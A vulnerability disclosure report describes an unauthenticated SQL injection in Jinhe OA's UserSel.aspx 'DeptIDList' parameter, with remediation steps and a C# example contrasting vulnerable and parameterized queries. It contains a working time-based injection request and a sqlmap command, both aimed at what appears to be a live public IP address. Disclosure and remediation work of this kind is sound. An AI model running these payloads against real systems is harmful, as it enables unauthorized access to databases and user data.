# Jinhe OA SQL Injection Vulnerability Report #1

## Vulnerability Overview

* **Vulnerability Type**: SQL Injection
* **Affected Product**: Jinhe OA (Jsoft OA)
* **Affected Component**: `C:\Jsoft.Web.Plansummarizer\UserSel.aspx`
* **Affected Version**: V1.0
* **Root Cause**: The `DeptIDList` parameter is concatenated directly into the SQL query without validation or parameterization.
* **Exploitation Conditions**: No authentication required.

## Impact Scope

* Unauthorized access to sensitive user data and business information.
* Potential privilege escalation via database access.
* Possible remote code execution on the database server.
* Complete compromise of the OA system and its data.

## Proof of Concept (POC)

**Proof-of-Concept Request:**

```http
GET /C:/Jsoft.Web.Plansummarizer/UserSel.aspx?GetDeptIDList=DeptIDList=1;WAITFOR DELAY '0:0:5'-- HTTP/1.1
Host: 221.1.82.114:8088
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application
Accept-Encoding: gzip, deflate, br
Cookie: ASP.NET_Session2=exqurufz2f5f5fMwujusut3
Connection: keep-alive
```

**sqlmap Detection Command:**

```bash
python sqlmap.py --random-agent --batch -u "http://221.1.82.114:8088/C:/Jsoft.Web.Plansummarizer/UserSel.aspx?GetDeptIDList=DeptIDList=1" --dbms=mssql --current-db
```

## Remediation

1. Use parameterized queries (prepared statements) for all database interactions.
2. Apply strict input validation and filtering to all user inputs.
3. Adhere to the principle of least privilege for database accounts.
4. Conduct comprehensive code audits.
5. Deploy a Web Application Firewall (WAF) as a temporary protective measure.
6. Perform regular security testing and penetration testing.
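As an added example that is not the vendor's code, the following C# is a hypothetical reconstruction of the flawed `DeptIDList` concatenation beside the parameterized form that remediation steps 1 and 2 call for; the table, column and method names are assumptions, and the value-per-parameter binding is needed because `IN (...)` lists cannot be bound as a single parameter.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;
using System.Linq;
// Hypothetical reconstruction of the reported pattern; not Jinhe OA's own code.
public static class UserSelQueries
{
    // Vulnerable pattern: DeptIDList is spliced into the SQL text, so a value such as
    // "1;WAITFOR DELAY '0:0:5'--" becomes part of the statement the server executes.
    public static DataTable GetUsersVulnerable(SqlConnection conn, string deptIdList)
    {
        string sql = "SELECT UserID, UserName FROM Users WHERE DeptID IN (" + deptIdList + ")";
        var dt = new DataTable();
        new SqlDataAdapter(sql, conn).Fill(dt);
        return dt;
    }
    // Hardened version: each list element is validated as an integer and bound as its
    // own typed parameter, so no user-supplied characters ever reach the SQL text.
    public static DataTable GetUsersSafe(SqlConnection conn, string deptIdList)
    {
        List<int> ids = ParseIdList(deptIdList);
        if (ids.Count == 0) return new DataTable();
        string[] names = ids.Select((_, i) => "@d" + i).ToArray();
        string sql = "SELECT UserID, UserName FROM Users WHERE DeptID IN (" + string.Join(",", names) + ")";
        using (var cmd = new SqlCommand(sql, conn))
        {
            for (int i = 0; i < ids.Count; i++)
                cmd.Parameters.Add(names[i], SqlDbType.Int).Value = ids[i];
            var dt = new DataTable();
            new SqlDataAdapter(cmd).Fill(dt);
            return dt;
        }
    }
    // Accepts only comma-separated integers ("1,5,12"); anything else is rejected
    // before any database call, which also gives a clean place to log the attempt.
    public static List<int> ParseIdList(string raw)
    {
        var ids = new List<int>();
        if (string.IsNullOrWhiteSpace(raw)) return ids;
        foreach (string part in raw.Split(','))
        {
            if (!int.TryParse(part.Trim(), out int id))
                throw new ArgumentException("DeptIDList must contain only integers");
            ids.Add(id);
        }
        return ids;
    }
}
```

With the hardened version, the time-based payload in the PoC fails validation before a connection is ever used, and the rejected request can be logged as a detection signal.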